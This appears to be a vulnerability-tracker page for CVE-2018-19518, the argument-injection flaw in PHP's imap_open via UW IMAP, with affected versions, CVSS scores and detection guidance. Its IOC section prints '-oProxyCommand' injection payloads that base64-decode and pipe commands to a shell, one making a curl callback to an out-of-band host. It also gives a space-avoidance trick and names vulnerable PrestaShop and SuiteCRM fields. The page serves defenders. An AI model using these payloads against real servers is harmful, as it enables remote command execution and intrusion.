cbcvebase.
CVE-2018-19518
published 2018-11-25

CVE-2018-19518: University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap…

PriorityP187high7.5CVSS 3.1
AVNACHPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEVRansomwareInitial access
Exploited in the wild
EPSS
95.23%
99.9th percentile
University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument.

Affected

13 ranges
VendorProductVersion rangeFixed in
canonicalubuntu_linux
canonicalubuntu_linux
canonicalubuntu_linux
debiandebian_linux
debiandebian_linux
debianuw-imap< uw-imap 8:2007f~dfsg-6 (bookworm)uw-imap 8:2007f~dfsg-6 (bookworm)
phpphp5.6.0 – 5.6.38
phpphp7.0.0 – 7.0.32
phpphp7.1.0 – 7.1.24
phpphp7.2.0 – 7.2.12
uw-imap_projectuw-imap
uw-imap_projectuw-imap>= 0 < 8:2007f~dfsg-68:2007f~dfsg-6
uw-imap_projectuw-imap>= 0 < 8:2007f~dfsg-68:2007f~dfsg-6

Detection & IOCsextracted from sources · hover to see the quote

command-oProxyCommand=`echo <base64_payload>|base64 -d|bash`
commandx -oProxyCommand=echo {{base64(url_encode('curl {{interactsh-url}}'))}}|base64 -d|sh}
port143
  • Look for IMAP server name fields (e.g., PS_SAV_IMAP_URL, server_url) in POST requests containing '-oProxyCommand' — this is the core injection vector passed to rsh/ssh.
  • Monitor for imap_open() calls in PHP where the mailbox/server parameter is user-controlled and does not include the /norsh flag, as this enables the rsh/ssh ProxyCommand injection path.
  • Detect POST requests to PrestaShop AdminCustomerThreads controller with a PS_SAV_IMAP_URL field value starting with 'x ' followed by '-oProxyCommand'.
  • Detect POST requests to SuiteCRM InboundEmail Save action with a server_url field value starting with 'x ' followed by '-oProxyCommand'.
  • Alert on spawned ssh/rsh child processes from a PHP/web-server process (e.g., apache, nginx, php-fpm) with arguments containing 'ProxyCommand', indicating successful exploitation.
  • In fuzzing/DAST scanning, inject the payload into HTTP query parameters and match for outbound HTTP callbacks (curl User-Agent) to confirm blind RCE via OAST.
  • ·The vulnerability is only exploitable on systems where rsh is symlinked or mapped to ssh (common on Debian/Ubuntu), enabling the -oProxyCommand argument injection. Systems where rsh is the traditional rsh binary are not exploitable via this vector.
  • ·PHP installations using imap_open() with the /norsh flag are not vulnerable, as the flag prevents the rsh preauthentication path from being invoked.
  • ·Red Hat Enterprise Linux 7 and 8 are listed as 'Not affected', so detection rules targeting RHEL 7/8 environments may produce false positives or be irrelevant.
  • ·The payload must avoid spaces; the Metasploit module substitutes spaces with $IFS$() to bypass shell argument parsing restrictions.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.08.5HIGHAV:N/AC:M/Au:S/C:C/I:C/A:C
osv7.5HIGH
vulncheck7.5HIGH
vendor_debian7.5HIGH
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.